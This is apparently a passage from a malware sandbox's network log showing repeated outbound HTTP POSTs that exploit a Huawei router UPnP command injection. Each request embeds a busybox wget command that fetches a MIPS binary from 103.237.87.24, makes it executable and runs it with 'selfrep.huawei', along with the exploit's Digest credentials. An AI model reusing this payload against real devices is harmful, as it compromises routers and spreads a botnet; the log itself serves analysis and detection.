                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  681192.168.2.134638641.141.102.5237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308583021 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  682192.168.2.1343814152.177.33.4037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308583975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  683192.168.2.135222220.77.156.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308681011 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  684192.168.2.133936641.227.226.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308691025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  685192.168.2.1360534157.155.201.23137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308691978 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  686192.168.2.1359444197.86.152.1537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308722019 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  687192.168.2.1347870125.146.72.20237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308722973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  688192.168.2.1339206157.197.248.5737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308732033 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  689192.168.2.134574241.118.230.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308754921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  690192.168.2.1350728132.107.52.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.308754921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 